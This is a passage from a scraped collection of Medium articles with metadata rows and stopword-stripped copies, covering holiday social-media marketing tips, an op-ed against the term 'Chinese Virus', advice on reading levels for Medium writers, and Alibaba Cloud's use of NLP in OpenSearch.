Facebook, which helps bump up the algorithms and you should see even more reach on your posts. In fact, Facebook states that live videos on average get six times as many interactions as regular videos. Strive to stand out in the news feed and create “thumb-stopping” live video content that draws your audience in. What if you did a whole “bah humbug” Facebook Live centered around how crazy it is that stores seem to start pushing the Holidays earlier and earlier every year? Use the broadcast as a fun way to get your audience talking to you — and with one another — about their preferences around the Holidays. You can then retarget your video viewers with different content driving to your website, offers, etc. Or, perhaps someone in your office would be willing to dress up as Santa Claus and do a whole series of Facebook Live videos where you do prize drawings and giveaways! Or, mobilize some team members to come on live video as “Santa’s elves” and show behind-the-scenes of how your products are created, or your service is developed. Think outside the box and get creative to put a smile on the faces of your prospects and customers and have your business/brand be top of feed and top of mind! 3. Collaborate with Influencers and Create Gift Suggestions | Lilach Bullock, Content Marketing and Social Media Specialist It’s difficult to stand out during the holiday season when everybody is sharing special offers and discounts. But one way to stand out and generate better results during this period, is to collaborate with a relevant social influencer as they can help you reach a wider audience. However, you need to start working on this campaign way ahead of time: from finding the ideal influencers to work with to planning the actual content, it’s a big project but one that can yield amazing results. Another tip I have to mention is to create remarketing campaigns on social media and target all of those people who viewed your products but didn’t buy. Everyone is looking for gifts during this time period so chances are, they’re checking out a lot of ideas and products — remind them of your products at the right time and it can have an amazing effect on your sales. 4. Give Your Social Media Channels a Holiday Makeover | Virginia Nussey, Marketing Director at MobileMonkey Holiday fever is not just for ecommerce. B2B should get hyped for the holidays, too. Holidays are an occasion for a company to reveal its customer appreciation along with its culture, brand and staff appreciation. And doing so can have a positive marketing impact through visibility and brand affinity during the cheery time of year. Give your Facebook chatbot and social media avatars a holiday makeover — and that will mean something different for every brand. Just because B2B marketers don’t have a Black Holiday sale to promote for the holidays (although, you certainly could!), doesn’t mean you shouldn’t have some holiday fun. Your customers (and future customers) may fall a little more in love with you when you take the opportunity to get in the spirit! 5. Curate Sentimental User-Generated Content | Dennis Yu, CEO of BlitzMetrics My №1 tip for the holidays … ask customers and employees what they’re grateful for, collecting the pictures and videos. Then after getting their permission, you now have a massive library of UGC (user-generated content) that you can mix and match to drive sales without having to rely as much on sales and discounts. And now you’ve solved your content issue, too. 6. Run Remarketing Ads | Neil Patel, Founder of Neil Patel Digital During the holiday season, expect your ad costs to increase. Consider pushing out more educational content and sharing them on your social profiles. You can even spend a bit of ad money to promote these educational pieces. From there remarket all of those users and pitch them your product/service through remarketing ads. It’s one of the cheapest ways to acquire customers from the social web at an affordable rate. 7. Show the Human Side of Your Business | Sujan Patel, Co-founder of Mailshake Something I’ve seen that customers and followers of our brand engage with around the holidays is learning more about the team behind the scenes. We are fully remote, and have employees working literally around the world. We’ll work with our employees to share interesting stories about them with our audience to give people the human side of our business. People are in “family” mode, not “business” mode around the holidays. Sharing our company family with them pulls on that thread a bit. 8. Start Early | Marsha Collier, Social Media Author It’s a two-pronged approach. Start by reconnecting with your existing customers very early on without a hard sell. Let them know you’re there to help make their holidays easier. Then during the season, your ads should always go for the hard close — make your offer ads irresistible. 9. Create Holiday-Themed Content | Kristel Cuenta-Cortez, Social Media Strategist There’s so much truth in the statement “If you fail to plan, you plan to fail,” especially when crafting a social media campaign for your brand. One best practice successful brands do to ramp up their campaigns is to put together a holiday-themed content schedule based on their goals. For example, if your goal is to solicit customer reviews and collect user-generated content that you can utilize in the future, you can run a simple photo contest where you ask your customers to submit their entries with a branded hashtag. Pick a relevant prize and decide on the theme, and find the best time to launch it! Monitor your results and adjust your strategy as you go along! This doesn’t only provide social proof, but it also saves valuable time and effort since user-generated content is generally free. 10. Leverage Influencers | Lisa Dougherty, Community Manager at Content Marketing Institute My number one social media marketing tip for B2C marketers is to work with top influencers in your niche. People like to scroll through their newsfeeds looking for gift-giving ideas. I know I do. And, they tend to trust brand recommendations from individuals (even if they don’t know them). But, before you get started, make sure you’ve set a clear goal that aligns with your business objectives. Once you’ve determined your goals, you’ll need to find the right influencers in your industry to work with. Once you do, put those influencers to work as your brand’s little elves creating customized content for your social media channels to help increase visibility, trustworthiness, and generate ROI for your brand. Be a Unicorn in a Sea of Donkeys Get my very best Unicorn marketing & entrepreneurship growth hacks: 2. Sign up for occasional Facebook Messenger Marketing news & tips via Facebook Messenger. About the Author Larry Kim is the CEO of MobileMonkey — provider of the World’s Best Facebook Messenger Marketing Platform. He’s also the founder of WordStream. You can connect with him on Facebook Messenger, Twitter, LinkedIn, Instagram. Do you want a Free Facebook Chatbot builder for your Facebook page? Check out MobileMonkey! Originally posted on Inc.com
https://medium.com/marketing-and-entrepreneurship/10-holiday-marketing-tips-from-larry-kim-neil-patel-and-more-ac0731e1e7a7
['Larry Kim']
2020-10-20 08:08:14.523000+00:00
['Marketing', 'Entrepreneurship', 'Business', 'Social Media', 'Marketing Tips']
Title 10 Holiday Marketing Tips Larry Kim Neil Patel MoreContent It’s time amp adjust marketing strategy holiday want get ahead marketing game stand crowd check incredible unicorn tip top social medium marketing expert We’ve got insight Mari Smith Neil Patel Virginia Nussey Dennis Yu Lilach Bullock Lisa Dougherty Marsha Collier Sujan Patel Kristel CuentaCortez Among tip Leveraging live video launching Facebook Messenger chatbots running social medium ad — aim increasing brand visibility ramping holiday sale boosting ROI let’s jump right — I’ll start №1 holiday marketing tip 1 Run Facebook Messenger Ads Larry Kim CEO MobileMonkey Ad price get crazy competitive around holiday Since sale going come customer preexisting brand affinity focus majority social ad budget using remarketing targeting option rather trying new unproven audience critical time People’s inboxes full offer try reaching audience using new higherengagement marketing channel like Facebook Messenger ad Facebook Instagram ensure targeted audience actually see important marketing message 2 Go Live Facebook Mari Smith Facebook Marketing Expert Use holidaythemed Facebook Live video really engage audience holiday season Facebook continues favor content generates meaningful social interaction specifically conversation people within comment Page post Live video typically lead discussion among viewer Facebook help bump algorithm see even reach post fact Facebook state live video average get six time many interaction regular video Strive stand news feed create “thumbstopping” live video content draw audience whole “bah humbug” Facebook Live centered around crazy store seem start pushing Holidays earlier earlier every year Use broadcast fun way get audience talking — one another — preference around Holidays retarget video viewer different content driving website offer etc perhaps someone office would willing dress Santa Claus whole series Facebook Live video prize drawing giveaway mobilize team member come live video “Santa’s elves” show behindthescenes product created service developed Think outside box get creative put smile face prospect customer businessbrand top feed top mind 3 Collaborate Influencers Create Gift Suggestions Lilach Bullock Content Marketing Social Media Specialist It’s difficult stand holiday season everybody sharing special offer discount one way stand generate better result period collaborate relevant social influencer help reach wider audience However need start working campaign way ahead time finding ideal influencers work planning actual content it’s big project one yield amazing result Another tip mention create remarketing campaign social medium target people viewed product didn’t buy Everyone looking gift time period chance they’re checking lot idea product — remind product right time amazing effect sale 4 Give Social Media Channels Holiday Makeover Virginia Nussey Marketing Director MobileMonkey Holiday fever ecommerce B2B get hyped holiday Holidays occasion company reveal customer appreciation along culture brand staff appreciation positive marketing impact visibility brand affinity cheery time year Give Facebook chatbot social medium avatar holiday makeover — mean something different every brand B2B marketer don’t Black Holiday sale promote holiday although certainly could doesn’t mean shouldn’t holiday fun customer future customer may fall little love take opportunity get spirit 5 Curate Sentimental UserGenerated Content Dennis Yu CEO BlitzMetrics №1 tip holiday … ask customer employee they’re grateful collecting picture video getting permission massive library UGC usergenerated content mix match drive sale without rely much sale discount you’ve solved content issue 6 Run Remarketing Ads Neil Patel Founder Neil Patel Digital holiday season expect ad cost increase Consider pushing educational content sharing social profile even spend bit ad money promote educational piece remarket user pitch productservice remarketing ad It’s one cheapest way acquire customer social web affordable rate 7 Show Human Side Business Sujan Patel Cofounder Mailshake Something I’ve seen customer follower brand engage around holiday learning team behind scene fully remote employee working literally around world We’ll work employee share interesting story audience give people human side business People “family” mode “business” mode around holiday Sharing company family pull thread bit 8 Start Early Marsha Collier Social Media Author It’s twopronged approach Start reconnecting existing customer early without hard sell Let know you’re help make holiday easier season ad always go hard close — make offer ad irresistible 9 Create HolidayThemed Content Kristel CuentaCortez Social Media Strategist There’s much truth statement “If fail plan plan fail” especially crafting social medium campaign brand One best practice successful brand ramp campaign put together holidaythemed content schedule based goal example goal solicit customer review collect usergenerated content utilize future run simple photo contest ask customer submit entry branded hashtag Pick relevant prize decide theme find best time launch Monitor result adjust strategy go along doesn’t provide social proof also save valuable time effort since usergenerated content generally free 10 Leverage Influencers Lisa Dougherty Community Manager Content Marketing Institute number one social medium marketing tip B2C marketer work top influencers niche People like scroll newsfeeds looking giftgiving idea know tend trust brand recommendation individual even don’t know get started make sure you’ve set clear goal aligns business objective you’ve determined goal you’ll need find right influencers industry work put influencers work brand’s little elf creating customized content social medium channel help increase visibility trustworthiness generate ROI brand Unicorn Sea Donkeys Get best Unicorn marketing entrepreneurship growth hack 2 Sign occasional Facebook Messenger Marketing news tip via Facebook Messenger Author Larry Kim CEO MobileMonkey — provider World’s Best Facebook Messenger Marketing Platform He’s also founder WordStream connect Facebook Messenger Twitter LinkedIn Instagram want Free Facebook Chatbot builder Facebook page Check MobileMonkey Originally posted InccomTags Marketing Entrepreneurship Business Social Media Marketing Tips
3,874
Bill Maher Is Wrong, We Shouldn’t Call COVID-19 the “Chinese Virus”
Bill Maher Is Wrong, We Shouldn’t Call COVID-19 the “Chinese Virus” Chinese people have enough to deal with right now. Let’s not add our bigotry to their misery. There’s a pretty big debate raging right now in the United States— and pretty much only in the United States— over whether or not COVID-19 should be dubbed the “Chinese Virus.” To me this seemed so obviously xenophobic that I didn’t feel much need to write a rebuttal. The nomenclature was being pushed almost exclusively by conservatives with a history of bigotry, including President Trump himself. But then somehow, the nonsense started to spread. While most of the mainstream media is heeding the advice of the World Health Organization to not use the term “Chinese Virus,” liberal comedian and talk show host Bill Maher disagrees. On the April 10 episode of his TV show Real Time, Bill Maher thought it wise to film a five-minute rant about how this whole thing is China’s fault, and we should all be blaming them. Before Bill acts as a carrier to spread this xenophobic stance beyond the toxic bubble of conservative news and radio, I would like to offer my counterargument. I can’t believe this needs to be said, but here’s why we shouldn’t be calling COVID-19 the “Chinese Virus.” Real Time with Bill Maher, 10 April 2020 1. The “we always do” argument is counterfactual Bill starts his segment by giving a bunch of examples of viruses that were named after where they originated. This is an argument I’ve also seen from prominent figures on Twitter — that because Lyme disease was named after a town of 7,000 people in Connecticut, coronavirus should be tied to the 1.38 billion people of China. This argument doesn’t hold for several reasons. First of all, why all of China? The disease originated very specifically from a single wet market in Wuhan province; why not name it after that one market? The reason is simple: accuracy was never the true concern. Ebola was named after a river, not a country or an ethnicity. Zika virus was named after a forest. Nobody is blaming the river or the forest for the spread of the virus, but Bill explicitly wants to blame China, so he expands his naming convention to fit his political argument. The one case that Bill clings to where a virus was actually named after a fairly large part of the world is MERS, or Middle Eastern Respiratory Syndrome. But even here, nobody uses the full name, nobody blamed the entire Middle East for having areas where camels live in close proximity to humans (MERS is said to have originated from a camel), and the region is home to a wide variety of countries and ethnicities, making the name arguably less xenophobic. The other important counter argument to this whole “this is how we’ve always named viruses” nonsense is that, well, it’s not. SARS stands for Severe Acute Respiratory Syndrome, not South-Asian Respiratory Syndrome. Think of all the pandemics we’ve suffered in recent memory, whether mad cow disease, swine flu, bird flu, HIV, HPV, even going back to the black plague — none of these were named after where the disease originated. Naming the virus after the region where it originated is the exception, not the rule. If anything, we should be questioning why we thought MERS was acceptable. The final argument on this point is that when the virus began, nobody was calling it the “Chinese Virus.” The virus first showed up in the media as simply “the coronavirus.” That name is still used in a lot of other countries — in France it’s “coronavirus,” in Japan it’s “new-form corona” (新型コロナ). Only in countries that, for some reason or another, want to blame China is the term “Chinese Virus” used, and it was adopted well after the virus started to spread. Well after other names were already attributed and widely accepted. 2. There are reasons to criticize China. The origin of the virus isn’t one of them. Now that we’ve established that there is no historical or logical reason to call COVID-19 the “Chinese Virus,” let’s look at the core of Bill’s rant: blaming China. The only clear reason he gives to is that some people in China eat bats. There is a sliver of truth to part of this argument. It’s true that wet markets are vectors for disease. It’s true the Chinese government knew about this, and poor policy decisions made this pandemic worse. But none of that has to do with eating bats. Bill is essentially saying, “Eating bats is wrong; the whole world should eat what I find palatable, like chickens, pigs and cows.” Plenty of people around the world eat plenty of food that, if mishandled, can lead to disease. This includes the United States, where you can buy a whole host of exotic meats if you know where to look. From an epidemiological perspective, the problem isn’t what Chinese people are eating, but how those animals are being handled. The close proximity and unsanitary conditions in wet markets make it more likely for certain virus strands to jump species and mutate in ways that can ultimately be dangerous to humans. Chinese authorities knew about these risks but authorized wet markets anyway, which is a reckless and shortsighted policy that deserves criticism. Blame the authorities, not the entire country and its population. Also, stop with the “Ewww gross, how could you eat that?” argument as a way to demonize other cultures. Bill’s tirade becomes particularly misleading when he implies that Chinese culture in general is causing a bunch of viruses to emerge. It’s true SARS also originated from the same region, although there is not enough evidence to suggest it came from a wet market. Bird flu likely comes from intensive bird farming — those chickens that almost everyone eats in tremendous quantities all over the world. The bird flu epidemic started in Hong Kong, which doesn’t have wet markets, and whose culture overall is significantly different from that of the people in Wuhan province. To sum up, the coronavirus is much more complex than “China does unhealthy stuff,” and using this pandemic to air out political grievances isn’t helping anyone. 3. We’re all in this together The world’s leading health and human rights experts are adamant: We’re all in this together, and we should be much more careful in assigning blame. Chinese authorities now have to respond to their negligence both domestically — as many of their people died and their economy is in shambles — and internationally. There should be pressure on the Chinese government to take aggressive measures to ensure a coronavirus outbreak doesn’t happen again. In practice, they should implement strict measures to close wet markets and more closely control the handling and sale of animals. That being said, for the vast majority of people in China who have never even been to a wet market, the virus itself is already a heavy and tragic burden. Those people deserve our solidarity; not misguided antipathy. Anger and fear are the most natural human reactions in times of crisis, but they only serve to make things worse. I don’t expect Bill to realize how mistaken his views are — controversy brings in ratings, which bring in money. I only hope his fans will think critically, recognize that he is wrong, and denounce him for using his platform to spread misinformation and stoke antagonism. The pandemic is causing more than enough human suffering as is. Let’s not add bigotry to misery.
https://medium.com/an-injustice/bill-maher-is-wrong-we-shouldnt-call-covid-19-the-chinese-virus-5d416100c2a2
['Alex Steullet']
2020-04-15 22:28:43.211000+00:00
['Culture', 'Society', 'Coronavirus', 'China', 'Politics']
Title Bill Maher Wrong Shouldn’t Call COVID19 “Chinese Virus”Content Bill Maher Wrong Shouldn’t Call COVID19 “Chinese Virus” Chinese people enough deal right Let’s add bigotry misery There’s pretty big debate raging right United States— pretty much United States— whether COVID19 dubbed “Chinese Virus” seemed obviously xenophobic didn’t feel much need write rebuttal nomenclature pushed almost exclusively conservative history bigotry including President Trump somehow nonsense started spread mainstream medium heeding advice World Health Organization use term “Chinese Virus” liberal comedian talk show host Bill Maher disagrees April 10 episode TV show Real Time Bill Maher thought wise film fiveminute rant whole thing China’s fault blaming Bill act carrier spread xenophobic stance beyond toxic bubble conservative news radio would like offer counterargument can’t believe need said here’s shouldn’t calling COVID19 “Chinese Virus” Real Time Bill Maher 10 April 2020 1 “we always do” argument counterfactual Bill start segment giving bunch example virus named originated argument I’ve also seen prominent figure Twitter — Lyme disease named town 7000 people Connecticut coronavirus tied 138 billion people China argument doesn’t hold several reason First China disease originated specifically single wet market Wuhan province name one market reason simple accuracy never true concern Ebola named river country ethnicity Zika virus named forest Nobody blaming river forest spread virus Bill explicitly want blame China expands naming convention fit political argument one case Bill cling virus actually named fairly large part world MERS Middle Eastern Respiratory Syndrome even nobody us full name nobody blamed entire Middle East area camel live close proximity human MERS said originated camel region home wide variety country ethnicity making name arguably le xenophobic important counter argument whole “this we’ve always named viruses” nonsense well it’s SARS stand Severe Acute Respiratory Syndrome SouthAsian Respiratory Syndrome Think pandemic we’ve suffered recent memory whether mad cow disease swine flu bird flu HIV HPV even going back black plague — none named disease originated Naming virus region originated exception rule anything questioning thought MERS acceptable final argument point virus began nobody calling “Chinese Virus” virus first showed medium simply “the coronavirus” name still used lot country — France it’s “coronavirus” Japan it’s “newform corona” 新型コロナ country reason another want blame China term “Chinese Virus” used adopted well virus started spread Well name already attributed widely accepted 2 reason criticize China origin virus isn’t one we’ve established historical logical reason call COVID19 “Chinese Virus” let’s look core Bill’s rant blaming China clear reason give people China eat bat sliver truth part argument It’s true wet market vector disease It’s true Chinese government knew poor policy decision made pandemic worse none eating bat Bill essentially saying “Eating bat wrong whole world eat find palatable like chicken pig cows” Plenty people around world eat plenty food mishandled lead disease includes United States buy whole host exotic meat know look epidemiological perspective problem isn’t Chinese people eating animal handled close proximity unsanitary condition wet market make likely certain virus strand jump specie mutate way ultimately dangerous human Chinese authority knew risk authorized wet market anyway reckless shortsighted policy deserves criticism Blame authority entire country population Also stop “Ewww gross could eat that” argument way demonize culture Bill’s tirade becomes particularly misleading implies Chinese culture general causing bunch virus emerge It’s true SARS also originated region although enough evidence suggest came wet market Bird flu likely come intensive bird farming — chicken almost everyone eats tremendous quantity world bird flu epidemic started Hong Kong doesn’t wet market whose culture overall significantly different people Wuhan province sum coronavirus much complex “China unhealthy stuff” using pandemic air political grievance isn’t helping anyone 3 We’re together world’s leading health human right expert adamant We’re together much careful assigning blame Chinese authority respond negligence domestically — many people died economy shamble — internationally pressure Chinese government take aggressive measure ensure coronavirus outbreak doesn’t happen practice implement strict measure close wet market closely control handling sale animal said vast majority people China never even wet market virus already heavy tragic burden people deserve solidarity misguided antipathy Anger fear natural human reaction time crisis serve make thing worse don’t expect Bill realize mistaken view — controversy brings rating bring money hope fan think critically recognize wrong denounce using platform spread misinformation stoke antagonism pandemic causing enough human suffering Let’s add bigotry miseryTags Culture Society Coronavirus China Politics
3,875
Stop Thinking You Need to Dumb Down Your Articles for Medium
Stop Thinking You Need to Dumb Down Your Articles for Medium I analyzed the top 10 popular articles for the day, and this is what I discovered. Photo by Christian Perello on Unsplash If you read Medium articles on how to succeed at writing on Medium, you likely have seen the popular advice that you need to keep your writing level around a 6th-grade reading level. The argument here is that the average American has around a 7th or 8th-grade reading level. Also, online reading is quite different than printed pages. When people read articles online, they tend to scan rather than read every word. Now, writing at a 6th-grade reading level doesn't mean your writing is meant for 6th graders. Ernest Hemingway famously wrote at a 5th-grade reading level much of the time, and his works are not taught in grammar school. However, I question the need to write at a 6th grade level for the Medium audience. For one thing, many Medium readers are also writers. Writers tend to read a lot. People who read a lot naturally read at higher levels than those who do not. Further, not every popular article on the internet is at a low reading level. The New York Times articles, for example, average a 10th-grade reading level. But what about Medium? Do we really need to be shooting for 6th-grade reading levels to get more claps and reader engagement?
https://medium.com/illumination/stop-thinking-you-need-to-dumb-down-your-articles-for-medium-dcee6eb75f10
['Jennifer Geer']
2020-10-24 18:04:01.690000+00:00
['Creativity', 'Writing Tips', 'Medium', 'Writing Advice', 'Writing']
Title Stop Thinking Need Dumb Articles MediumContent Stop Thinking Need Dumb Articles Medium analyzed top 10 popular article day discovered Photo Christian Perello Unsplash read Medium article succeed writing Medium likely seen popular advice need keep writing level around 6thgrade reading level argument average American around 7th 8thgrade reading level Also online reading quite different printed page people read article online tend scan rather read every word writing 6thgrade reading level doesnt mean writing meant 6th grader Ernest Hemingway famously wrote 5thgrade reading level much time work taught grammar school However question need write 6th grade level Medium audience one thing many Medium reader also writer Writers tend read lot People read lot naturally read higher level every popular article internet low reading level New York Times article example average 10thgrade reading level Medium really need shooting 6thgrade reading level get clap reader engagementTags Creativity Writing Tips Medium Writing Advice Writing
3,876
The Application of Natural Language Processing in OpenSearch
Catch the replay of the Apsara Conference 2020 at this link! By ELK Geek, with special guest, Xie Pengjun (Chengchen), Senior Algorithm Expert of Alibaba Cloud AI Introduction: When building search engines, effect optimization issues will emerge, many of which are related to Natural Language Processing (NLP). This article interprets and analyzes these issues by combining the technical points of NLP in OpenSearch. Natural Language Processing Research on NLP aims to achieve effective communication between humans and computers through languages. It is a science that integrates linguistics, psychology, computer science, mathematics, and statistics. It involves many topics, such as analysis, extraction, understanding, conversion, and the generation of natural languages and symbolic languages. The Stages of AI Computing Intelligence: It refers to the ability to outperform humans in some areas by relying on computing power and the ability to store massive data. A representative example is “Alphago” from Google. With the strong computing power of Google TPU and the combination of algorithms, like Monte Carlo Tree Search (MCTS) and reinforcement learning, Alphago can make good decisions by processing massive information about the Go game. Thus, it can outperform humans in terms of computational ability. It refers to the ability to outperform humans in some areas by relying on computing power and the ability to store massive data. A representative example is “Alphago” from Google. With the strong computing power of Google TPU and the combination of algorithms, like Monte Carlo Tree Search (MCTS) and reinforcement learning, Alphago can make good decisions by processing massive information about the Go game. Thus, it can outperform humans in terms of computational ability. Intellisense: It refers to the ability to identify important elements from unstructured data. For example, it can analyze a query to identify information, such as people’s names, places, and institutions. It refers to the ability to identify important elements from unstructured data. For example, it can analyze a query to identify information, such as people’s names, places, and institutions. Cognitive Intelligence: Based on intellisense, cognitive intelligence can understand the meaning of elements and make some inferences. For example, in Chinese, sentences like “谢霆锋是谁的儿子” and “谁是谢霆锋的儿子” both contain the same characters, but the semantics of them are different. This is what cognitive intelligence aims to solve. Based on intellisense, cognitive intelligence can understand the meaning of elements and make some inferences. For example, in Chinese, sentences like “谢霆锋是谁的儿子” and “谁是谢霆锋的儿子” both contain the same characters, but the semantics of them are different. This is what cognitive intelligence aims to solve. Creative Intelligence: It refers to computers’ ability to create sentences that conform to common sense, semantics, and logic, based on understandings of semantics. For example, computers can automatically write novels, create music, and chat with people naturally. The research on NLP covers all of the subjects above. NLP is necessary to realize comprehensive AI. The Development Trend of NLP The breakthrough in in-depth language models will lead to the progress of important natural language technologies. NLP services on public clouds will evolve to customized services from general functions. Natural language technologies will be gradually and closely integrated with industries and scenarios to create greater value. The Capabilities of Alibaba Group’s NLP Platform From bottom to top, the capabilities of the NLP platform are divided into NLP data, NLP basic capabilities, NLP application technologies, and high-level applications. NLP data is the basis for many algorithms, including language dictionaries, substantive knowledge dictionaries, syntactic dictionaries, and sentiment analysis dictionaries. Basic NLP technologies include lexical analysis, syntactic analysis, text analysis, and in-depth models. On top of basic NLP technologies, there are vertical technologies of NLP, including Q&A and conversation technologies, anti-spam technology, and address resolution. The combination of these technologies supports many applications. Among them, OpenSearch is an application with intensive NLP capabilities. Applications and Typical NLP Technologies in OpenSearch The infrastructure of OpenSearch includes Alibaba Cloud’s basic products and exclusive search systems based on the search scenarios of Alibaba Cloud’s ecosystem, such as HA3, RTP, and Dii. The basic management platform ensures the collection, management, and training of offline data. The algorithm module is divided into two parts. One is related to query parsing, including multi-grained word segmentation (MWS), entity recognition, error correction, and rewriting. Another is related to correlation and sorting, including text correlation, prediction of Click Through Rate (CTR) and Conversion Rate (CVR), and Learning to Rank (LTR). Parts with orange backgrounds are related to NLP The goal of OpenSearch is to create all-in-one and out-of-the-box intelligent search services. Alibaba Cloud will open these algorithms to users in the form of industry templates, scenarios, and peripheral services. The Analyzing Procedure of NLP in OpenSearch A search starts with a keyword. For example, when a user searches “aj1北卡兰新款球鞋” in Chinese, the analyzing procedure works like this: Cross-Domain Word Segmentation Alibaba Cloud has provided a series of open models for cross-domain word segmentation in OpenSearch. Word Segmentation Challenges The effect of word segmentation is greatly reduced by additional unrecognized words or so-called “new words” in various fields. The costs to customize word segmentation models for new users of the process from data labeling to data training are expensive. Solution A model for forming terms can be built by combining statistical characteristics, such as mutual information, and left-skewed and right-skewed log transformations. By doing so, a domain dictionary can be quickly built based on user data. By combining word segmentation models from a source domain with dictionaries from a target domain, a tokenizer can be quickly built in a target domain based on remote supervision technology. The figure above shows the automatic cross-domain word segmentation framework. Users need to provide some corpus data from their business, and Alibaba Cloud can automatically build a customized word segmentation model. This method greatly improves efficiency and meets the needs of customers quickly. This technology offers better results compared to the open-source general models of word segmentation in various domains. Named Entity Recognition (NER) NER can recognize important elements. For example, NER can recognize and extract people’s names, places, and times in queries. Challenges and Difficulties There is a lot of research and challenges for NER in NLP. NER faces difficulties, such as boundary ambiguity, semantic ambiguity, and nesting ambiguity, especially in Chinese, due to the lack of native word separators. Solution The architecture of the NER model in OpenSearch is shown in the upper-right corner of the following figure. In OpenSearch, many users have accumulated a large number of dictionary object libraries. To make full use of these libraries, Alibaba Cloud builds a GraphNER framework that organically integrates knowledge based on the BERT model. As shown on the table in the lower-right corner, the best effect of NER can be achieved in Chinese. Spelling Correction The error correction steps of OpenSearch include mining, training, evaluation, and online prediction. The main model of spelling correction is based on the statistical translation model and the neural network translation model. Also, the model has a complete set of methods in performance, display style, and intervention. Semantic Matching The emergence of in-depth language models has greatly improved many NLP tasks, especially for semantic matching. Alibaba DAMO Academy has also proposed many innovations based on BERT and developed the exclusive StructBERT model. The main innovation of StructBERT is that in the training of in-depth language models, it adds more objective functions of words and term orders. More diverse objective functions for sentence structure prediction are also added to carry out multi-task learning. However, the universal StructBERT model cannot be provided to different customers in different domains. Alibaba Cloud needs to adapt StructBERT to different domains. Therefore, a three-stage paradigm for semantic matching has been proposed to create a semantic matching model that is used to quickly produce customized semantic models for customers. Process details are shown in the figure below: Services Based on NLP Algorithms The systematic architecture of services based on algorithms includes offline computing, online engines, and product consoles. As shown in the figure, the light blue area shows the algorithm-related features provided by NLP in OpenSearch. Users can experience and use these features directly in the console. Original Source: Gain Access to Expert View — Subscribe to DDI Intel
https://medium.com/datadriveninvestor/the-application-of-natural-language-processing-in-opensearch-7b91a899d9bb
['Alibaba Cloud']
2020-12-08 15:36:51.284000+00:00
['Algorithms', 'Big Data', 'Naturallanguageprocessing', 'Artificial Intelligence', 'Alibabacloud']
Title Application Natural Language Processing OpenSearchContent Catch replay Apsara Conference 2020 link ELK Geek special guest Xie Pengjun Chengchen Senior Algorithm Expert Alibaba Cloud AI Introduction building search engine effect optimization issue emerge many related Natural Language Processing NLP article interprets analyzes issue combining technical point NLP OpenSearch Natural Language Processing Research NLP aim achieve effective communication human computer language science integrates linguistics psychology computer science mathematics statistic involves many topic analysis extraction understanding conversion generation natural language symbolic language Stages AI Computing Intelligence refers ability outperform human area relying computing power ability store massive data representative example “Alphago” Google strong computing power Google TPU combination algorithm like Monte Carlo Tree Search MCTS reinforcement learning Alphago make good decision processing massive information Go game Thus outperform human term computational ability refers ability outperform human area relying computing power ability store massive data representative example “Alphago” Google strong computing power Google TPU combination algorithm like Monte Carlo Tree Search MCTS reinforcement learning Alphago make good decision processing massive information Go game Thus outperform human term computational ability Intellisense refers ability identify important element unstructured data example analyze query identify information people’s name place institution refers ability identify important element unstructured data example analyze query identify information people’s name place institution Cognitive Intelligence Based intellisense cognitive intelligence understand meaning element make inference example Chinese sentence like “谢霆锋是谁的儿子” “谁是谢霆锋的儿子” contain character semantics different cognitive intelligence aim solve Based intellisense cognitive intelligence understand meaning element make inference example Chinese sentence like “谢霆锋是谁的儿子” “谁是谢霆锋的儿子” contain character semantics different cognitive intelligence aim solve Creative Intelligence refers computers’ ability create sentence conform common sense semantics logic based understanding semantics example computer automatically write novel create music chat people naturally research NLP cover subject NLP necessary realize comprehensive AI Development Trend NLP breakthrough indepth language model lead progress important natural language technology NLP service public cloud evolve customized service general function Natural language technology gradually closely integrated industry scenario create greater value Capabilities Alibaba Group’s NLP Platform bottom top capability NLP platform divided NLP data NLP basic capability NLP application technology highlevel application NLP data basis many algorithm including language dictionary substantive knowledge dictionary syntactic dictionary sentiment analysis dictionary Basic NLP technology include lexical analysis syntactic analysis text analysis indepth model top basic NLP technology vertical technology NLP including QA conversation technology antispam technology address resolution combination technology support many application Among OpenSearch application intensive NLP capability Applications Typical NLP Technologies OpenSearch infrastructure OpenSearch includes Alibaba Cloud’s basic product exclusive search system based search scenario Alibaba Cloud’s ecosystem HA3 RTP Dii basic management platform ensures collection management training offline data algorithm module divided two part One related query parsing including multigrained word segmentation MWS entity recognition error correction rewriting Another related correlation sorting including text correlation prediction Click Rate CTR Conversion Rate CVR Learning Rank LTR Parts orange background related NLP goal OpenSearch create allinone outofthebox intelligent search service Alibaba Cloud open algorithm user form industry template scenario peripheral service Analyzing Procedure NLP OpenSearch search start keyword example user search “aj1北卡兰新款球鞋” Chinese analyzing procedure work like CrossDomain Word Segmentation Alibaba Cloud provided series open model crossdomain word segmentation OpenSearch Word Segmentation Challenges effect word segmentation greatly reduced additional unrecognized word socalled “new words” various field cost customize word segmentation model new user process data labeling data training expensive Solution model forming term built combining statistical characteristic mutual information leftskewed rightskewed log transformation domain dictionary quickly built based user data combining word segmentation model source domain dictionary target domain tokenizer quickly built target domain based remote supervision technology figure show automatic crossdomain word segmentation framework Users need provide corpus data business Alibaba Cloud automatically build customized word segmentation model method greatly improves efficiency meet need customer quickly technology offer better result compared opensource general model word segmentation various domain Named Entity Recognition NER NER recognize important element example NER recognize extract people’s name place time query Challenges Difficulties lot research challenge NER NLP NER face difficulty boundary ambiguity semantic ambiguity nesting ambiguity especially Chinese due lack native word separator Solution architecture NER model OpenSearch shown upperright corner following figure OpenSearch many user accumulated large number dictionary object library make full use library Alibaba Cloud build GraphNER framework organically integrates knowledge based BERT model shown table lowerright corner best effect NER achieved Chinese Spelling Correction error correction step OpenSearch include mining training evaluation online prediction main model spelling correction based statistical translation model neural network translation model Also model complete set method performance display style intervention Semantic Matching emergence indepth language model greatly improved many NLP task especially semantic matching Alibaba DAMO Academy also proposed many innovation based BERT developed exclusive StructBERT model main innovation StructBERT training indepth language model add objective function word term order diverse objective function sentence structure prediction also added carry multitask learning However universal StructBERT model cannot provided different customer different domain Alibaba Cloud need adapt StructBERT different domain Therefore threestage paradigm semantic matching proposed create semantic matching model used quickly produce customized semantic model customer Process detail shown figure Services Based NLP Algorithms systematic architecture service based algorithm includes offline computing online engine product console shown figure light blue area show algorithmrelated feature provided NLP OpenSearch Users experience use feature directly console Original Source Gain Access Expert View — Subscribe DDI IntelTags Algorithms Big Data Naturallanguageprocessing Artificial Intelligence Alibabacloud
3,877
Apache Spark on Amazon EMR
